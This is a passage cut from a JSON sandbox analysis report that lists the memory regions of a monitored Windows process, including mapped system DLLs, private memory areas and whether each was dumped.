"Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_243", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 32309248, "type": "region", "version": 1 }, "end_va": 32833535, "entry_point": 0, "filename": null, "id": "region_1478", "name": "private_0x0000000001ed0000", "norm_filename": null, "region_type": "private_memory", "start_va": 32309248, "timestamp": "00:01:08.208", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 352256, "start_va": 8791719804928, "type": "region", "version": 1 }, "end_va": 8791720157183, "entry_point": 8791719852992, "filename": "\\Windows\\System32\\uxtheme.dll", "id": "region_1479", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\system32\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 8791719804928, "timestamp": "00:01:08.208", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 626688, "start_va": 8791770071040, "type": "region", "version": 1 }, "end_va": 8791770697727, "entry_point": 8791770078224, "filename": "\\Windows\\System32\\clbcatq.dll", "id": "region_1480", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\system32\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 8791770071040, "timestamp": "00:01:08.208", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 14188544, "start_va": 8791773216768, "type": 
"region", "version": 1 }, "end_va": 8791787405311, "entry_point": 8791773728444, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_1481", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 8791773216768, "timestamp": "00:01:08.209", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 122880, "start_va": 8791742414848, "type": "region", "version": 1 }, "end_va": 8791742537727, "entry_point": 8791742419896, "filename": "\\Windows\\System32\\userenv.dll", "id": "region_1482", "name": "userenv.dll", "norm_filename": "c:\\windows\\system32\\userenv.dll", "region_type": "memory_mapped_file", "start_va": 8791742414848, "timestamp": "00:01:08.214", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791755390976, "type": "region", "version": 1 }, "end_va": 8791755452415, "entry_point": 8791755397552, "filename": "\\Windows\\System32\\profapi.dll", "id": "region_1483", "name": "profapi.dll", "norm_filename": "c:\\windows\\system32\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 8791755390976, "timestamp": "00:01:08.215", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1318911, "entry_point": 0, "filename": null, "id": "region_1484", "name": "pagefile_0x0000000000140000", "norm_filename": 
null, "region_type": "pagefile_backed_memory", "start_va": 1310720, "timestamp": "00:01:08.223", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2048000, "start_va": 8791731339264, "type": "region", "version": 1 }, "end_va": 8791733387263, "entry_point": 8791732963620, "filename": "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll", "id": "region_1485", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 8791731339264, "timestamp": "00:01:08.223", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 3932160, "type": "region", "version": 1 }, "end_va": 3936255, "entry_point": 0, "filename": null, "id": "region_1496", "name": "pagefile_0x00000000003c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3932160, "timestamp": "00:01:08.285", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 3997696, "type": "region", "version": 1 }, "end_va": 4005887, "entry_point": 0, "filename": null, "id": "region_1497", "name": "pagefile_0x00000000003d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3997696, 
"timestamp": "00:01:08.285", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 32833536, "type": "region", "version": 1 }, "end_va": 35778559, "entry_point": 32833536, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1498", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 32833536, "timestamp": "00:01:08.285", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001499-addr_0x0000000002300000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_245", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 36700160, "type": "region", "version": 1 }, "end_va": 37224447, "entry_point": 0, "filename": null, "id": "region_1499", "name": "private_0x0000000002300000", "norm_filename": null, "region_type": "private_memory", "start_va": 36700160, "timestamp": "00:01:08.286", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 106496, "start_va": 8791757881344, "type": "region", "version": 1 }, "end_va": 8791757987839, "entry_point": 8791757886808, "filename": "\\Windows\\System32\\devobj.dll", "id": "region_1500", "name": "devobj.dll", "norm_filename": "c:\\windows\\system32\\devobj.dll", "region_type": "memory_mapped_file", "start_va": 8791757881344, "timestamp": "00:01:08.286", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ 
"unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 221184, "start_va": 8791758471168, "type": "region", "version": 1 }, "end_va": 8791758692351, "entry_point": 8791758476404, "filename": "\\Windows\\System32\\cfgmgr32.dll", "id": "region_1501", "name": "cfgmgr32.dll", "norm_filename": "c:\\windows\\system32\\cfgmgr32.dll", "region_type": "memory_mapped_file", "start_va": 8791758471168, "timestamp": "00:01:08.287", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1929216, "start_va": 8791759716352, "type": "region", "version": 1 }, "end_va": 8791761645567, "entry_point": 8791759720464, "filename": "\\Windows\\System32\\setupapi.dll", "id": "region_1502", "name": "setupapi.dll", "norm_filename": "c:\\windows\\system32\\setupapi.dll", "region_type": "memory_mapped_file", "start_va": 8791759716352, "timestamp": "00:01:08.287", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001503-addr_0x000007fffffdb000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_246", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092870656, "type": "region", "version": 1 }, "end_va": 8796092878847, "entry_point": 0, "filename": null, "id": "region_1503", "name": "private_0x000007fffffdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092870656, "timestamp": "00:01:08.288", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed 
regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 37224448, "type": "region", "version": 1 }, "end_va": 41365503, "entry_point": 0, "filename": null, "id": "region_1504", "name": "pagefile_0x0000000002380000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 37224448, "timestamp": "00:01:08.296", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1228800, "start_va": 8791736057856, "type": "region", "version": 1 }, "end_va": 8791737286655, "entry_point": 8791736095932, "filename": "\\Windows\\System32\\propsys.dll", "id": "region_1505", "name": "propsys.dll", "norm_filename": "c:\\windows\\system32\\propsys.dll", "region_type": "memory_mapped_file", "start_va": 8791736057856, "timestamp": "00:01:08.296", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 184320, "start_va": 8791738548224, "type": "region", "version": 1 }, "end_va": 8791738732543, "entry_point": 8791738552336, "filename": "\\Windows\\System32\\ntmarta.dll", "id": "region_1506", "name": "ntmarta.dll", "norm_filename": "c:\\windows\\system32\\ntmarta.dll", "region_type": "memory_mapped_file", "start_va": 8791738548224, "timestamp": "00:01:08.299", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 335872, "start_va": 8791772823552, "type": "region", "version": 1 }, "end_va": 8791773159423, "entry_point": 8791772827860, 
"filename": "\\Windows\\System32\\Wldap32.dll", "id": "region_1507", "name": "wldap32.dll", "norm_filename": "c:\\windows\\system32\\wldap32.dll", "region_type": "memory_mapped_file", "start_va": 8791772823552, "timestamp": "00:01:08.300", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 126976, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4321279, "entry_point": 4194304, "filename": "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000011.db", "id": "region_1508", "name": "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db", "region_type": "memory_mapped_file", "start_va": 4194304, "timestamp": "00:01:08.419", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 4325376, "type": "region", "version": 1 }, "end_va": 4329471, "entry_point": 0, "filename": null, "id": "region_1509", "name": "pagefile_0x0000000000420000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4325376, "timestamp": "00:01:08.420", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001510-addr_0x0000000002260000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_247", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", 
"version": 1 }, "size": 524288, "start_va": 36044800, "type": "region", "version": 1 }, "end_va": 36569087, "entry_point": 0, "filename": null, "id": "region_1510", "name": "private_0x0000000002260000", "norm_filename": null, "region_type": "private_memory", "start_va": 36044800, "timestamp": "00:01:08.420", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 212992, "start_va": 8791631986688, "type": "region", "version": 1 }, "end_va": 8791632199679, "entry_point": 8791631986688, "filename": "\\Windows\\System32\\shdocvw.dll", "id": "region_1511", "name": "shdocvw.dll", "norm_filename": "c:\\windows\\system32\\shdocvw.dll", "region_type": "memory_mapped_file", "start_va": 8791631986688, "timestamp": "00:01:08.420", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 8791682449408, "type": "region", "version": 1 }, "end_va": 8791682805759, "entry_point": 8791682453784, "filename": "\\Windows\\System32\\apphelp.dll", "id": "region_1512", "name": "apphelp.dll", "norm_filename": "c:\\windows\\system32\\apphelp.dll", "region_type": "memory_mapped_file", "start_va": 8791682449408, "timestamp": "00:01:08.438", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001513-addr_0x000007fffffd9000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_248", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092862464, "type": "region", "version": 1 }, "end_va": 
8796092870655, "entry_point": 0, "filename": null, "id": "region_1513", "name": "private_0x000007fffffd9000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092862464, "timestamp": "00:01:08.439", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 8791631921152, "type": "region", "version": 1 }, "end_va": 8791631970303, "entry_point": 8791631921152, "filename": "\\Windows\\System32\\linkinfo.dll", "id": "region_1526", "name": "linkinfo.dll", "norm_filename": "c:\\windows\\system32\\linkinfo.dll", "region_type": "memory_mapped_file", "start_va": 8791631921152, "timestamp": "00:01:08.592", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 4063232, "type": "region", "version": 1 }, "end_va": 4079615, "entry_point": 4063232, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_1560", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 4063232, "timestamp": "00:01:08.648", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 196608, "start_va": 4390912, "type": "region", "version": 1 }, "end_va": 4587519, "entry_point": 4390912, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000018.db", "id": "region_1561", "name": 
"{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db", "region_type": "memory_mapped_file", "start_va": 4390912, "timestamp": "00:01:08.649", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 4587520, "type": "region", "version": 1 }, "end_va": 4603903, "entry_point": 4587520, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_1562", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 4587520, "timestamp": "00:01:08.649", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 417792, "start_va": 31850496, "type": "region", "version": 1 }, "end_va": 32268287, "entry_point": 31850496, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db", "id": "region_1563", "name": "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db", "region_type": "memory_mapped_file", "start_va": 31850496, "timestamp": "00:01:08.649", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 524288, "start_va": 8791659053056, "type": "region", "version": 
1 }, "end_va": 8791659577343, "entry_point": 8791659072140, "filename": "\\Windows\\System32\\ntshrui.dll", "id": "region_1564", "name": "ntshrui.dll", "norm_filename": "c:\\windows\\system32\\ntshrui.dll", "region_type": "memory_mapped_file", "start_va": 8791659053056, "timestamp": "00:01:08.650", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001569-addr_0x0000000002920000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_258", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 43122688, "type": "region", "version": 1 }, "end_va": 43646975, "entry_point": 0, "filename": null, "id": "region_1569", "name": "private_0x0000000002920000", "norm_filename": null, "region_type": "private_memory", "start_va": 43122688, "timestamp": "00:01:08.693", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791659577344, "type": "region", "version": 1 }, "end_va": 8791659638783, "entry_point": 8791659581504, "filename": "\\Windows\\System32\\cscapi.dll", "id": "region_1570", "name": "cscapi.dll", "norm_filename": "c:\\windows\\system32\\cscapi.dll", "region_type": "memory_mapped_file", "start_va": 8791659577344, "timestamp": "00:01:08.693", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 8791729766400, "type": "region", "version": 1 }, "end_va": 8791729811455, "entry_point": 8791729786764, "filename": "\\Windows\\System32\\slc.dll", "id": 
"region_1571", "name": "slc.dll", "norm_filename": "c:\\windows\\system32\\slc.dll", "region_type": "memory_mapped_file", "start_va": 8791729766400, "timestamp": "00:01:08.694", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 143360, "start_va": 8791753228288, "type": "region", "version": 1 }, "end_va": 8791753371647, "entry_point": 8791753232792, "filename": "\\Windows\\System32\\srvcli.dll", "id": "region_1572", "name": "srvcli.dll", "norm_filename": "c:\\windows\\system32\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 8791753228288, "timestamp": "00:01:08.695", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001573-addr_0x000007fffffd7000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_259", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092854272, "type": "region", "version": 1 }, "end_va": 8796092862463, "entry_point": 0, "filename": null, "id": "region_1573", "name": "private_0x000007fffffd7000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092854272, "timestamp": "00:01:08.696", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 626688, "start_va": 8791550525440, "type": "region", "version": 1 }, "end_va": 8791551152127, "entry_point": 8791550535280, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll", "id": "region_1574", "name": "mscoreei.dll", "norm_filename": 
"c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll", "region_type": "memory_mapped_file", "start_va": 8791550525440, "timestamp": "00:01:08.717", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 290816, "start_va": 8791744839680, "type": "region", "version": 1 }, "end_va": 8791745130495, "entry_point": 8791744843876, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_1575", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 8791744839680, "timestamp": "00:01:08.718", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 8791747985408, "type": "region", "version": 1 }, "end_va": 8791748079615, "entry_point": 8791747998392, "filename": "\\Windows\\System32\\cryptsp.dll", "id": "region_1576", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\system32\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 8791747985408, "timestamp": "00:01:08.718", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 4653056, "type": "region", "version": 1 }, "end_va": 4657151, "entry_point": 0, "filename": null, "id": "region_1577", "name": "pagefile_0x0000000000470000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4653056, "timestamp": "00:01:08.777", "type": "region", "version": 1 }, { "dump": { "filename": 
"process_00000008-region_00001578-addr_0x00000000027e0000-size_0x0000000000080000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_260", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 41811968, "type": "region", "version": 1 }, "end_va": 42336255, "entry_point": 0, "filename": null, "id": "region_1578", "name": "private_0x00000000027e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 41811968, "timestamp": "00:01:08.777", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001579-addr_0x00000000029a0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_261", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 43646976, "type": "region", "version": 1 }, "end_va": 44695551, "entry_point": 0, "filename": null, "id": "region_1579", "name": "private_0x00000000029a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 43646976, "timestamp": "00:01:08.778", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001580-addr_0x0000000002b20000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_262", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 45219840, "type": "region", "version": 1 }, "end_va": 45285375, "entry_point": 0, "filename": null, "id": "region_1580", "name": "private_0x0000000002b20000", "norm_filename": null, "region_type": "private_memory", "start_va": 45219840, "timestamp": "00:01:08.778", "type": 
"region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1966473216, "type": "region", "version": 1 }, "end_va": 1967296511, "entry_point": 1966484976, "filename": "\\Windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\\msvcr80.dll", "id": "region_1581", "name": "msvcr80.dll", "norm_filename": "c:\\windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\\msvcr80.dll", "region_type": "memory_mapped_file", "start_va": 1966473216, "timestamp": "00:01:08.778", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 10080256, "start_va": 8791320756224, "type": "region", "version": 1 }, "end_va": 8791330836479, "entry_point": 8791325254400, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorwks.dll", "id": "region_1582", "name": "mscorwks.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorwks.dll", "region_type": "memory_mapped_file", "start_va": 8791320756224, "timestamp": "00:01:08.779", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 8791740448768, "type": "region", "version": 1 }, "end_va": 8791740497919, "entry_point": 8791740452964, "filename": "\\Windows\\System32\\version.dll", "id": "region_1583", "name": "version.dll", "norm_filename": "c:\\windows\\system32\\version.dll", "region_type": "memory_mapped_file", "start_va": 
8791740448768, "timestamp": "00:01:08.780", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 4718592, "type": "region", "version": 1 }, "end_va": 4730879, "entry_point": 0, "filename": null, "id": "region_1605", "name": "pagefile_0x0000000000480000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4718592, "timestamp": "00:01:09.054", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 30146560, "type": "region", "version": 1 }, "end_va": 30150655, "entry_point": 0, "filename": null, "id": "region_1606", "name": "pagefile_0x0000000001cc0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 30146560, "timestamp": "00:01:09.054", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001607-addr_0x0000000001ce0000-size_0x0000000000020000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_267", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 30277632, "type": "region", "version": 1 }, "end_va": 30408703, "entry_point": 0, "filename": null, "id": "region_1607", "name": "private_0x0000000001ce0000", "norm_filename": null, "region_type": "private_memory", "start_va": 30277632, "timestamp": "00:01:09.055", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001608-addr_0x0000000002880000-size_0x0000000000080000-perm_rw.bin", 
"flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_268", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 42467328, "type": "region", "version": 1 }, "end_va": 42991615, "entry_point": 0, "filename": null, "id": "region_1608", "name": "private_0x0000000002880000", "norm_filename": null, "region_type": "private_memory", "start_va": 42467328, "timestamp": "00:01:09.055", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001609-addr_0x0000000002b70000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_269", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 45547520, "type": "region", "version": 1 }, "end_va": 46071807, "entry_point": 0, "filename": null, "id": "region_1609", "name": "private_0x0000000002b70000", "norm_filename": null, "region_type": "private_memory", "start_va": 45547520, "timestamp": "00:01:09.055", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 402653184, "start_va": 46071808, "type": "region", "version": 1 }, "end_va": 448724991, "entry_point": 0, "filename": null, "id": "region_1610", "name": "private_0x0000000002bf0000", "norm_filename": null, "region_type": "private_memory", "start_va": 46071808, "timestamp": "00:01:09.063", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001611-addr_0x000000001abf0000-size_0x00000000006d0000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a 
